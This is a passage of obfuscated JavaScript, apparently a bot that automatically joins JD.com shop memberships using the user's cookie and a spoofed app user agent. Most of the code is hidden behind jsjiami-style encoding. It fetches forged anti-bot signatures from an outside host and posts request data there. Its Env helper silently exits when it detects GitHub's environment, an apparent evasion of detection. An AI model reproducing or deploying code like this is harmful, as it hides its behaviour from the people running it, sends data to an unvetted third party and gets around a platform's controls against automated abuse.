30\x3d','\x57\x6b\x74\x34\x53\x6b\x34\x3d','\x59\x30\x56\x51\x63\x6d\x4d\x3d','\x65\x45\x64\x72\x54\x47\x38\x3d','\x5a\x45\x74\x57\x64\x6d\x67\x3d','\x51\x58\x68\x73\x63\x6d\x6f\x3d','\x4f\x47\x46\x6b\x5a\x6d\x49\x3d','\x61\x6d\x52\x66\x63\x32\x68\x76\x63\x46\x39\x74\x5a\x57\x31\x69\x5a\x58\x49\x3d','\x4f\x53\x34\x79\x4c\x6a\x41\x3d','\x61\x6d\x52\x7a\x61\x57\x64\x75\x4c\x6d\x4e\x6d','\x59\x58\x42\x77\x62\x47\x6c\x6a\x59\x58\x52\x70\x62\x32\x34\x76\x61\x6e\x4e\x76\x62\x67\x3d\x3d','\x64\x6c\x6c\x43\x5a\x45\x67\x3d','\x51\x6b\x31\x47\x61\x33\x6b\x3d','\x61\x58\x56\x36\x61\x31\x45\x3d','\x5a\x30\x68\x33\x52\x58\x6f\x3d','\x55\x32\x56\x4d\x52\x6e\x45\x3d','\x52\x57\x35\x59\x65\x6c\x6b\x3d','\x55\x48\x70\x34\x63\x55\x67\x3d','\x54\x6c\x52\x42\x55\x56\x41\x3d','\x61\x30\x56\x78\x65\x6e\x45\x3d','\x61\x6c\x5a\x59\x63\x48\x45\x3d','\x51\x57\x31\x4f\x63\x6b\x6b\x3d','\x63\x57\x6c\x43\x64\x32\x63\x3d','\x5a\x6d\x78\x76\x62\x33\x49\x3d','\x62\x46\x6c\x57\x65\x47\x73\x3d','\x63\x6d\x46\x75\x5a\x47\x39\x74','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6a\x5a\x47\x34\x75\x62\x6e\x6f\x75\x62\x48\x55\x76\x5a\x32\x56\x30\x61\x44\x56\x7a\x64\x41\x3d\x3d','\x52\x47\x5a\x61\x62\x32\x67\x3d','\x57\x45\x4e\x36\x62\x6e\x59\x3d','\x63\x47\x39\x7a\x64\x41\x3d\x3d','\x53\x6b\x64\x4a\x53\x6b\x6f\x3d','\x59\x30\x78\x31\x57\x56\x63\x3d','\x53\x6d\x56\x74\x64\x6b\x67\x3d','\x56\x46\x4e\x6c\x59\x55\x59\x3d','\x5a\x6c\x64\x6d\x54\x31\x51\x3d','\x59\x58\x42\x77\x62\x48\x6b\x3d','\x65\x6b\x39\x49\x64\x45\x67\x3d','\x56\x46\x70\x75\x51\x6d\x6f\x3d','\x62\x47\x39\x6e\x52\x58\x4a\x79','\x61\x30\x64\x42\x55\x55\x51\x3d','\x56\x46\x6c\x48\x57\x48\x6f\x3d','\x59\x58\x42\x70\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74','\x4b\x69\x38\x71','\x61\x32\x56\x6c\x63\x43\x31\x68\x62\x47\x6c\x32\x5a\x51\x3d\x3d','\x65\x6d\x67\x74\x59\x32\x34\x3d','\x5a\x33\x70\x70\x63\x43\x77\x67\x5a\x47\x56\x6d\x62\x47\x46\x30\x5a\x53\x77\x67\x59\x6e\x49\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x68\x63\x47\x6b\x75\x62\x53\x35\x71\x5a\x43\x35\x6a\x62\x32\x30\x76\x59\x32\x78\x70\x5a\x57\x35\x30\x4c\x6d\x46\x6a\x64\x47\x6c\x76\x62\x6a\x39\x68\x63\x48\x42\x70\x5a\x44\x31\x71\x5a\x46\x39\x7a\x61\x47\x39\x77\x58\x32\x31\x6c\x62\x57\x4a\x6c\x63\x69\x5a\x6d\x64\x57\x35\x6a\x64\x47\x6c\x76\x62\x6b\x6c\x6b\x50\x57\x64\x6c\x64\x46\x4e\x6f\x62\x33\x42\x50\x63\x47\x56\x75\x51\x32\x46\x79\x5a\x45\x6c\x75\x5a\x6d\x38\x6d\x59\x6d\x39\x6b\x65\x54\x30\x3d','\x65\x47\x52\x75\x51\x6c\x49\x3d','\x63\x33\x52\x79\x61\x57\x35\x6e\x61\x57\x5a\x35','\x4a\x6d\x4e\x73\x61\x57\x56\x75\x64\x44\x31\x49\x4e\x53\x5a\x6a\x62\x47\x6c\x6c\x62\x6e\x52\x57\x5a\x58\x4a\x7a\x61\x57\x39\x75\x50\x54\x6b\x75\x4d\x69\x34\x77\x4a\x6e\x56\x31\x61\x57\x51\x39\x4f\x44\x67\x34\x4f\x44\x67\x3d','\x55\x6b\x70\x46\x55\x33\x6f\x3d','\x62\x48\x5a\x6c\x64\x6e\x67\x3d','\x59\x31\x68\x71\x63\x6e\x41\x3d','\x61\x6d\x52\x68\x63\x48\x41\x37\x61\x56\x42\x6f\x62\x32\x35\x6c\x4f\x7a\x6b\x75\x4e\x53\x34\x30\x4f\x7a\x45\x7a\x4c\x6a\x59\x37','\x56\x56\x56\x4a\x52\x41\x3d\x3d','\x4f\x32\x35\x6c\x64\x48\x64\x76\x63\x6d\x73\x76\x64\x32\x6c\x6d\x61\x54\x74\x42\x52\x45\x6c\x45\x4c\x77\x3d\x3d','\x51\x55\x52\x4a\x52\x41\x3d\x3d','\x4f\x32\x31\x76\x5a\x47\x56\x73\x4c\x32\x6c\x51\x61\x47\x39\x75\x5a\x54\x45\x77\x4c\x44\x4d\x37\x59\x57\x52\x6b\x63\x6d\x56\x7a\x63\x32\x6c\x6b\x4c\x7a\x41\x37\x59\x58\x42\x77\x51\x6e\x56\x70\x62\x47\x51\x76\x4d\x54\x59\x33\x4e\x6a\x59\x34\x4f\x32\x70\x6b\x55\x33\x56\x77\x63\x47\x39\x79\x64\x45\x52\x68\x63\x6d\x74\x4e\x62\x32\x52\x6c\x4c\x7a\x41\x37\x54\x57\x39\x36\x61\x57\x78\x73\x59\x53\x38\x31\x4c\x6a\x41\x67\x4b\x47\x6c\x51\x61\x47\x39\x75\x5a\x54\x73\x67\x51\x31\x42\x56\x49\x47\x6c\x51\x61\x47\x39\x75\x5a\x53\x42\x50\x55\x79\x41\x78\x4d\x31\x38\x32\x49\x47\x78\x70\x61\x32\x55\x67\x54\x57\x46\x6a\x49\x45\x39\x54\x49\x46\x67\x70\x49\x45\x46\x77\x63\x47\x78\x6c\x56\x32\x56\x69\x53\x32\x6c\x30\x4c\x7a\x59\x77\x4e\x53\x34\x78\x4c\x6a\x45\x31\x49\x43\x68\x4c\x53\x46\x52\x4e\x54\x43\x77\x67\x62\x47\x6c\x72\x5a\x53\x42\x48\x5a\x57\x4e\x72\x62\x79\x6b\x67\x54\x57\x39\x69\x61\x57\x78\x6c\x4c\x7a\x45\x31\x52\x54\x45\x30\x4f\x44\x74\x7a\x64\x58\x42\x77\x62\x33\x4a\x30\x53\x6b\x52\x54\x53\x46\x64\x4c\x4c\x7a\x45\x3d','\x61\x57\x4a\x49\x5a\x48\x45\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x7a\x61\x47\x39\x77\x62\x57\x56\x74\x59\x6d\x56\x79\x4c\x6d\x30\x75\x61\x6d\x51\x75\x59\x32\x39\x74\x4c\x33\x4e\x6f\x62\x33\x42\x6a\x59\x58\x4a\x6b\x4c\x7a\x39\x32\x5a\x57\x35\x6b\x5a\x58\x4a\x4a\x5a\x44\x30\x3d','\x66\x53\x5a\x6a\x61\x47\x46\x75\x62\x6d\x56\x73\x50\x54\x67\x77\x4d\x53\x5a\x79\x5a\x58\x52\x31\x63\x6d\x35\x56\x63\x6d\x77\x39','\x59\x57\x4e\x30\x61\x58\x5a\x70\x64\x48\x6c\x56\x63\x6d\x77\x3d','\x5a\x55\x64\x48\x65\x6e\x67\x3d','\x61\x58\x46\x34\x57\x55\x38\x3d','\x59\x56\x52\x6b\x65\x6d\x55\x3d','\x62\x56\x52\x51\x65\x55\x63\x3d','\x5a\x32\x56\x30','\x6a\x6b\x73\x6a\x45\x69\x48\x61\x6d\x69\x64\x53\x2e\x63\x54\x6f\x6d\x43\x2e\x76\x36\x68\x6c\x45\x45\x56\x50\x75\x56\x3d\x3d'];if(function(_0x47dca4,_0x2e45a0,_0x2d0d38){function _0x358c40(_0x4e0fee,_0x44d395,_0x5f1629,_0x6d2cae,_0x379df8,_0x59c1d4){_0x44d395=_0x44d395>>0x8,_0x379df8='po';var _0x24e0cd='shift',_0x197297='push',_0x59c1d4='‮';if(_0x44d395<_0x4e0fee){while(--_0x4e0fee){_0x6d2cae=_0x47dca4[_0x24e0cd]();if(_0x44d395===_0x4e0fee&&_0x59c1d4==='‮'&&_0x59c1d4['length']===0x1){_0x44d395=_0x6d2cae,_0x5f1629=_0x47dca4[_0x379df8+'p']();}else if(_0x44d395&&_0x5f1629['replace'](/[kEHdSTChlEEVPuV=]/g,'')===_0x44d395){_0x47dca4[_0x197297](_0x6d2cae);}}_0x47dca4[_0x197297](_0x47dca4[_0x24e0cd]());}return 0xdaf2e;};return _0x358c40(++_0x2e45a0,_0x2d0d38)>>_0x2e45a0^_0x2d0d38;}(_0x1acd,0x1d5,0x1d500),_0x1acd){_0xod7_=_0x1acd['length']^0x1d5;};function _0x27de(_0x4ab799,_0x2148e0){_0x4ab799=~~'0x'['concat'](_0x4ab799['slice'](0x1));var _0x38aa70=_0x1acd[_0x4ab799];if(_0x27de['HEabFd']===undefined&&'‮'['length']===0x1){(function(){var _0x48587b=function(){var _0x226fa7;try{_0x226fa7=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x302471){_0x226fa7=window;}return _0x226fa7;};var _0x2dcb25=_0x48587b();var _0x5d0b0e='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x2dcb25['atob']||(_0x2dcb25['atob']=function(_0x41138d){var _0x37290e=String(_0x41138d)['replace'](/=+$/,'');for(var _0x1da2f9=0x0,_0x27e844,_0x496c4d,_0x55ec30=0x0,_0x46993b='';_0x496c4d=_0x37290e['charAt'](_0x55ec30++);~_0x496c4d&&(_0x27e844=_0x1da2f9%0x4?_0x27e844*0x40+_0x496c4d:_0x496c4d,_0x1da2f9++%0x4)?_0x46993b+=String['fromCharCode'](0xff&_0x27e844>>(-0x2*_0x1da2f9&0x6)):0x0){_0x496c4d=_0x5d0b0e['indexOf'](_0x496c4d);}return _0x46993b;});}());_0x27de['ciicrd']=function(_0x35e622){var _0x1ca022=atob(_0x35e622);var _0x460af0=[];for(var _0x27de2b=0x0,_0x1b5b31=_0x1ca022['length'];_0x27de2b<_0x1b5b31;_0x27de2b++){_0x460af0+='%'+('00'+_0x1ca022['charCodeAt'](_0x27de2b)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x460af0);};_0x27de['qeLOEi']={};_0x27de['HEabFd']=!![];}var _0x4e1a4f=_0x27de['qeLOEi'][_0x4ab799];if(_0x4e1a4f===undefined){_0x38aa70=_0x27de['ciicrd'](_0x38aa70);_0x27de['qeLOEi'][_0x4ab799]=_0x38aa70;}else{_0x38aa70=_0x4e1a4f;}return _0x38aa70;};function getShopOpenCardInfo(_0x2dfe13,_0x2a9c59){var _0x169e2b={'\x69\x71\x78\x59\x4f':function(_0x237960,_0x2865f7){return _0x237960===_0x2865f7;},'\x61\x54\x64\x7a\x65':_0x27de('‮0'),'\x6d\x54\x50\x79\x47':function(_0x5db734){return _0x5db734();},'\x78\x64\x6e\x42\x52':function(_0x27ef1f,_0x2696d1){return _0x27ef1f(_0x2696d1);},'\x52\x4a\x45\x53\x7a':_0x27de('‫1'),'\x6c\x76\x65\x76\x78':_0x27de('‫2'),'\x63\x58\x6a\x72\x70':_0x27de('‫3'),'\x69\x62\x48\x64\x71':_0x27de('‮4'),'\x65\x47\x47\x7a\x78':_0x27de('‫5')};let _0x4540b3={'\x75\x72\x6c':_0x27de('‮6')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,JSON[_0x27de('‫8')](_0x2dfe13))+_0x27de('‮9'),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x169e2b[_0x27de('‮a')],'\x41\x63\x63\x65\x70\x74':_0x169e2b[_0x27de('‮b')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x169e2b[_0x27de('‫c')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x169e2b[_0x27de('‫12')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x2a9c59+_0x27de('‮14')+_0x169e2b[_0x27de('‮7')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x169e2b[_0x27de('‮16')]}};return new Promise(_0x24d014=>{var _0x45d140={'\x4b\x72\x53\x57\x63':function(_0x564cc4,_0x316683){return _0x169e2b[_0x27de('‫17')](_0x564cc4,_0x316683);},'\x4c\x63\x4b\x6e\x79':_0x169e2b[_0x27de('‫18')],'\x54\x45\x49\x61\x6f':function(_0x32cebc){return _0x169e2b[_0x27de('‫19')](_0x32cebc);}};$[_0x27de('‫1a')](_0x4540b3,(_0x497df1,_0x18ad2f,_0x1d037c)=>{if(_0x45d140[_0x27de('‮1b')](_0x45d140[_0x27de('‮1c')],_0x45d140[_0x27de('‮1c')])){try{if(_0x497df1){console[_0x27de('‫1d')](_0x497df1);}else{res=JSON[_0x27de('‫1e')](_0x1d037c);if(res[_0x27de('‮1f')]){if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}}catch(_0x487efd){console[_0x27de('‫1d')](_0x487efd);}finally{_0x45d140[_0x27de('‮25')](_0x24d014);}}else{console[_0x27de('‫1d')](_0x497df1);}});});}async function bindWithVender(_0x4bf9aa,_0x5a230c){var _0x5180ad={'\x4d\x59\x68\x4c\x43':function(_0x396660){return _0x396660();},'\x6d\x77\x78\x44\x6d':function(_0x4b2169,_0x405a0d){return _0x4b2169!==_0x405a0d;},'\x7a\x56\x69\x61\x6e':_0x27de('‫26'),'\x45\x41\x49\x42\x41':_0x27de('‫27'),'\x49\x6a\x73\x62\x4a':function(_0xcf4ea9,_0x3221b8){return _0xcf4ea9===_0x3221b8;},'\x55\x4b\x72\x68\x55':_0x27de('‫28'),'\x57\x6b\x62\x48\x4c':_0x27de('‫29'),'\x4c\x52\x48\x6a\x4c':_0x27de('‮2a'),'\x4f\x43\x43\x4e\x77':_0x27de('‫2b'),'\x57\x5a\x73\x59\x5a':_0x27de('‫2c'),'\x57\x73\x6b\x70\x78':_0x27de('‮2d'),'\x45\x64\x7a\x6d\x68':function(_0x148959,_0x176008,_0x319ba8){return _0x148959(_0x176008,_0x319ba8);},'\x50\x75\x57\x6e\x46':_0x27de('‮2e'),'\x47\x76\x6e\x52\x55':_0x27de('‫1'),'\x46\x56\x6a\x4b\x45':_0x27de('‫2'),'\x54\x6e\x62\x73\x4b':_0x27de('‫3'),'\x6a\x79\x46\x4f\x50':_0x27de('‮4'),'\x61\x4c\x7a\x6b\x57':function(_0x3768db,_0x1db8ba){return _0x3768db(_0x1db8ba);},'\x56\x6b\x6e\x6f\x74':_0x27de('‫5')};return h5st=await _0x5180ad[_0x27de('‮2f')](geth5st,_0x5180ad[_0x27de('‮30')],_0x4bf9aa),opt={'\x75\x72\x6c':_0x27de('‮31')+h5st,'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x5180ad[_0x27de('‮32')],'\x41\x63\x63\x65\x70\x74':_0x5180ad[_0x27de('‫33')],'\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e':_0x5180ad[_0x27de('‮34')],'\x43\x6f\x6f\x6b\x69\x65':cookie,'User-Agent':_0x27de('‫d')+$[_0x27de('‫e')]+_0x27de('‫f')+$[_0x27de('‫10')]+_0x27de('‫11'),'Accept-Language':_0x5180ad[_0x27de('‫35')],'\x52\x65\x66\x65\x72\x65\x72':_0x27de('‮13')+_0x5a230c+_0x27de('‮36')+_0x5180ad[_0x27de('‮37')](encodeURIComponent,$[_0x27de('‫15')]),'Accept-Encoding':_0x5180ad[_0x27de('‫38')]}},new Promise(_0x2c2848=>{var _0x1f470d={'\x69\x50\x64\x65\x78':function(_0x4c0bea){return _0x5180ad[_0x27de('‫39')](_0x4c0bea);},'\x42\x77\x65\x53\x57':function(_0x240905,_0x2118e5){return _0x5180ad[_0x27de('‫3a')](_0x240905,_0x2118e5);},'\x79\x6e\x59\x71\x72':_0x5180ad[_0x27de('‫3b')],'\x70\x6b\x4f\x75\x73':_0x5180ad[_0x27de('‮3c')],'\x5a\x65\x59\x6e\x58':function(_0x2ff734,_0x50b6d9){return _0x5180ad[_0x27de('‮3d')](_0x2ff734,_0x50b6d9);},'\x69\x58\x4d\x4f\x79':_0x5180ad[_0x27de('‫3e')],'\x6d\x56\x77\x79\x58':function(_0x43cb7f,_0x5f0fa8){return _0x5180ad[_0x27de('‮3d')](_0x43cb7f,_0x5f0fa8);},'\x50\x62\x4f\x41\x42':_0x5180ad[_0x27de('‫3f')],'\x4f\x78\x6d\x55\x66':_0x5180ad[_0x27de('‫40')],'\x49\x62\x44\x6d\x51':_0x5180ad[_0x27de('‫41')],'\x62\x64\x67\x73\x4d':_0x5180ad[_0x27de('‫42')],'\x5a\x4b\x78\x4a\x4e':_0x5180ad[_0x27de('‮43')]};$[_0x27de('‫1a')](opt,(_0x311afb,_0x3b7aab,_0x4c2873)=>{var _0x53384e={'\x6d\x4d\x51\x6b\x76':function(_0x26e196){return _0x1f470d[_0x27de('‫44')](_0x26e196);}};try{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫46')],_0x1f470d[_0x27de('‮47')])){if(_0x311afb){if(_0x1f470d[_0x27de('‫48')](_0x1f470d[_0x27de('‫49')],_0x1f470d[_0x27de('‫49')])){console[_0x27de('‫1d')](_0x311afb);}else{console[_0x27de('‫1d')](error);}}else{if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4b')],_0x1f470d[_0x27de('‮4c')])){_0x53384e[_0x27de('‮4d')](_0x2c2848);}else{res=JSON[_0x27de('‫1e')](_0x4c2873);if(res[_0x27de('‮1f')]){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‫4e')],_0x1f470d[_0x27de('‫4e')])){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}else{console[_0x27de('‫1d')](_0x311afb);}}}}}else{Host=process[_0x27de('‮51')][_0x27de('‫52')];}}catch(_0x317968){if(_0x1f470d[_0x27de('‮4a')](_0x1f470d[_0x27de('‮53')],_0x1f470d[_0x27de('‮53')])){console[_0x27de('‫1d')](_0x317968);}else{$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}finally{if(_0x1f470d[_0x27de('‮45')](_0x1f470d[_0x27de('‫54')],_0x1f470d[_0x27de('‫54')])){_0x1f470d[_0x27de('‫44')](_0x2c2848);}else{_0x1f470d[_0x27de('‫44')](_0x2c2848);}}});});}function geth5st(_0x1c2dc4,_0x38bbf9){var _0xad3eae={'\x76\x59\x42\x64\x48':function(_0xb6682a,_0x1dbeb1){return _0xb6682a===_0x1dbeb1;},'\x42\x4d\x46\x6b\x79':_0x27de('‮55'),'\x69\x75\x7a\x6b\x51':function(_0x521e0c,_0x1ffbd9){return _0x521e0c!==_0x1ffbd9;},'\x67\x48\x77\x45\x7a':_0x27de('‮56'),'\x53\x65\x4c\x46\x71':_0x27de('‮57'),'\x45\x6e\x58\x7a\x59':function(_0x4fa54e,_0x1f1dc2){return _0x4fa54e===_0x1f1dc2;},'\x50\x7a\x78\x71\x48':_0x27de('‮58'),'\x4e\x54\x41\x51\x50':function(_0x3fd51b,_0x32a444){return _0x3fd51b(_0x32a444);},'\x6b\x45\x71\x7a\x71':_0x27de('‫59'),'\x6a\x56\x58\x70\x71':_0x27de('‫5a'),'\x41\x6d\x4e\x72\x49':_0x27de('‮5b'),'\x71\x69\x42\x77\x67':_0x27de('‫5c'),'\x6c\x59\x56\x78\x6b':function(_0x2a05e2,_0x15824){return _0x2a05e2*_0x15824;},'\x44\x66\x5a\x6f\x68':_0x27de('‫5d'),'\x58\x43\x7a\x6e\x76':function(_0x46d10b,_0x5b5da1){return _0x46d10b*_0x5b5da1;}};return new Promise(async _0x573221=>{var _0x1c0efb={'\x4a\x47\x49\x4a\x4a':function(_0x30195c,_0x3fe97e){return _0xad3eae[_0x27de('‮5e')](_0x30195c,_0x3fe97e);},'\x63\x4c\x75\x59\x57':_0xad3eae[_0x27de('‫5f')],'\x4a\x65\x6d\x76\x48':function(_0x41b061,_0x2c0980){return _0xad3eae[_0x27de('‫60')](_0x41b061,_0x2c0980);},'\x54\x53\x65\x61\x46':_0xad3eae[_0x27de('‫61')],'\x66\x57\x66\x4f\x54':_0xad3eae[_0x27de('‮62')],'\x7a\x4f\x48\x74\x48':function(_0x1029f8,_0x21337a){return _0xad3eae[_0x27de('‮63')](_0x1029f8,_0x21337a);},'\x54\x5a\x6e\x42\x6a':_0xad3eae[_0x27de('‫64')],'\x6b\x47\x41\x51\x44':function(_0x1b9d1f,_0x3ee921){return _0xad3eae[_0x27de('‫65')](_0x1b9d1f,_0x3ee921);}};let _0x23db17={'\x61\x70\x70\x49\x64':_0xad3eae[_0x27de('‫66')],'\x62\x6f\x64\x79':{'\x61\x70\x70\x69\x64':_0xad3eae[_0x27de('‫67')],'\x66\x75\x6e\x63\x74\x69\x6f\x6e\x49\x64':_0x1c2dc4,'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x38bbf9),'\x63\x6c\x69\x65\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e':_0xad3eae[_0x27de('‫68')],'\x63\x6c\x69\x65\x6e\x74':'\x48\x35','\x61\x63\x74\x69\x76\x69\x74\x79\x49\x64':$[_0x27de('‮24')]},'\x63\x61\x6c\x6c\x62\x61\x63\x6b\x41\x6c\x6c':!![]};let _0x2402da='';let _0x25911c=[_0xad3eae[_0x27de('‮69')]];if(process[_0x27de('‮51')][_0x27de('‫52')]){_0x2402da=process[_0x27de('‮51')][_0x27de('‫52')];}else{_0x2402da=_0x25911c[Math[_0x27de('‫6a')](_0xad3eae[_0x27de('‫6b')](Math[_0x27de('‫6c')](),_0x25911c[_0x27de('‮6d')]))];}let _0x5f5ad9={'\x75\x72\x6c':_0x27de('‮6e'),'\x62\x6f\x64\x79':JSON[_0x27de('‫8')](_0x23db17),'\x68\x65\x61\x64\x65\x72\x73':{'\x48\x6f\x73\x74':_0x2402da,'Content-Type':_0xad3eae[_0x27de('‮6f')]},'\x74\x69\x6d\x65\x6f\x75\x74':_0xad3eae[_0x27de('‫70')](0x1e,0x3e8)};$[_0x27de('‮71')](_0x5f5ad9,async(_0x4a1749,_0x300e08,_0x23db17)=>{if(_0x1c0efb[_0x27de('‫72')](_0x1c0efb[_0x27de('‫73')],_0x1c0efb[_0x27de('‫73')])){try{if(_0x4a1749){if(_0x1c0efb[_0x27de('‮74')](_0x1c0efb[_0x27de('‮75')],_0x1c0efb[_0x27de('‮76')])){_0x23db17=await geth5st[_0x27de('‮77')](this,arguments);}else{if(res[_0x27de('‮20')][_0x27de('‮21')]){$[_0x27de('‮22')]=res[_0x27de('‮20')][_0x27de('‮21')][0x0][_0x27de('‫23')][_0x27de('‮24')];}}}else{}}catch(_0x580180){if(_0x1c0efb[_0x27de('‫78')](_0x1c0efb[_0x27de('‮79')],_0x1c0efb[_0x27de('‮79')])){$[_0x27de('‫7a')](_0x580180,_0x300e08);}else{if(_0x4a1749){console[_0x27de('‫1d')](_0x4a1749);}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}}}finally{_0x1c0efb[_0x27de('‫7b')](_0x573221,_0x23db17);}}else{res=JSON[_0x27de('‫1e')](_0x23db17);if(res[_0x27de('‮1f')]){console[_0x27de('‫1d')](res);$[_0x27de('‫4f')]=res[_0x27de('‮50')];}}});});};_0xod7='jsjiami.com.v6'; -function Env(t,e){"undefined"!=typeof process&&JSON.stringify(process.env).indexOf("GITHUB")>-1&&process.exit(0);class s{constructor(t){this.env=t}send(t,e="GET"){t="string"==typeof t?{url:t}:t;let s=this.get;return"POST"===e&&(s=this.post),new Promise((e,i)=>{s.call(this,t,(t,s,r)=>{t?i(t):e(s)})})}get(t){return this.send.call(this.env,t)}post(t){return this.send.call(this.env,t,"POST")}}return new class{constructor(t,e){this.name=t,this.http=new s(this),this.data=null,this.dataFile="box.dat",this.logs=[],this.isMute=!1,this.isNeedRewrite=!1,this.logSeparator="\n",this.startTime=(new Date).getTime(),Object.assign(this,e),this.log("",`🔔${this.name}, 开始!`)}isNode(){return"undefined"!=typeof module&&!!module.exports}isQuanX(){return"undefined"!=typeof $task}isSurge(){return"undefined"!=typeof $httpClient&&"undefined"==typeof $loon}isLoon(){return"undefined"!=typeof $loon}toObj(t,e=null){try{return JSON.parse(t)}catch{return e}}toStr(t,e=null){try{return JSON.stringify(t)}catch{return e}}getjson(t,e){let s=e;const i=this.getdata(t);if(i)try{s=JSON.parse(this.getdata(t))}catch{}return s}setjson(t,e){try{return this.setdata(JSON.stringify(t),e)}catch{return!1}}getScript(t){return new Promise(e=>{this.get({url:t},(t,s,i)=>e(i))})}runScript(t,e){return new Promise(s=>{let i=this.getdata("@chavy_boxjs_userCfgs.httpapi");i=i?i.replace(/\n/g,"").trim():i;let r=this.getdata("@chavy_boxjs_userCfgs.httpapi_timeout");r=r?1*r:20,r=e&&e.timeout?e.timeout:r;const[o,h]=i.split("@"),n={url:`http://${h}/v1/scripting/evaluate`,body:{script_text:t,mock_type:"cron",timeout:r},headers:{"X-Key":o,Accept:"*/*"}};this.post(n,(t,e,i)=>s(i))}).catch(t=>this.logErr(t))}loaddata(){if(!this.isNode())return{};{this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e);if(!s&&!i)return{};{const i=s?t:e;try{return JSON.parse(this.fs.readFileSync(i))}catch(t){return{}}}}}writedata(){if(this.isNode()){this.fs=this.fs?this.fs:require("fs"),this.path=this.path?this.path:require("path");const t=this.path.resolve(this.dataFile),e=this.path.resolve(process.cwd(),this.dataFile),s=this.fs.existsSync(t),i=!s&&this.fs.existsSync(e),r=JSON.stringify(this.data);s?this.fs.writeFileSync(t,r):i?this.fs.writeFileSync(e,r):this.fs.writeFileSync(t,r)}}lodash_get(t,e,s){const i=e.replace(/\[(\d+)\]/g,".$1").split(".");let r=t;for(const t of i)if(r=Object(r)[t],void 0===r)return s;return r}lodash_set(t,e,s){return Object(t)!==t?t:(Array.isArray(e)||(e=e.toString().match(/[^.[\]]+/g)||[]),e.slice(0,-1).reduce((t,s,i)=>Object(t[s])===t[s]?t[s]:t[s]=Math.abs(e[i+1])>>0==+e[i+1]?[]:{},t)[e[e.length-1]]=s,t)}getdata(t){let e=this.getval(t);if(/^@/.test(t)){const[,s,i]=/^@(.*?)\.(.*?)$/.exec(t),r=s?this.getval(s):"";if(r)try{const t=JSON.parse(r);e=t?this.lodash_get(t,i,""):e}catch(t){e=""}}return e}setdata(t,e){let s=!1;if(/^@/.test(e)){const[,i,r]=/^@(.*?)\.(.*?)$/.exec(e),o=this.getval(i),h=i?"null"===o?null:o||"{}":"{}";try{const e=JSON.parse(h);this.lodash_set(e,r,t),s=this.setval(JSON.stringify(e),i)}catch(e){const o={};this.lodash_set(o,r,t),s=this.setval(JSON.stringify(o),i)}}else s=this.setval(t,e);return s}getval(t){return this.isSurge()||this.isLoon()?$persistentStore.read(t):this.isQuanX()?$prefs.valueForKey(t):this.isNode()?(this.data=this.loaddata(),this.data[t]):this.data&&this.data[t]||null}setval(t,e){return this.isSurge()||this.isLoon()?$persistentStore.write(t,e):this.isQuanX()?$prefs.setValueForKey(t,e):this.isNode()?(this.data=this.loaddata(),this.data[e]=t,this.writedata(),!0):this.data&&this.data[e]||null}initGotEnv(t){this.got=this.got?this.got:require("got"),this.cktough=this.cktough?this.cktough:require("tough-cookie"),this.ckjar=this.ckjar?this.ckjar:new this.cktough.CookieJar,t&&(t.headers=t.headers?t.headers:{},void 0===t.headers.Cookie&&void 0===t.cookieJar&&(t.cookieJar=this.ckjar))}get(t,e=(()=>{})){t.headers&&(delete t.headers["Content-Type"],delete t.headers["Content-Length"]),this.isSurge()||this.isLoon()?(this.isSurge()&&this.isNeedRewrite&&(t.headers=t.headers||{},Object.assign(t.headers,{"X-Surge-Skip-Scripting":!1})),$httpClient.get(t,(t,s,i)=>{!t&&s&&(s.body=i,s.statusCode=s.status),e(t,s,i)})):this.isQuanX()?(this.isNeedRewrite&&(t.opts=t.opts||{},Object.assign(t.opts,{hints:!1})),$task.fetch(t).then(t=>{const{statusCode:s,statusCode:i,headers:r,body:o}=t;e(null,{status:s,statusCode:i,headers:r,body:o},o)},t=>e(t))):this.isNode()&&(this.initGotEnv(t),this.got(t).on("redirect",(t,e)=>{try{if(t.headers["set-cookie"]){const 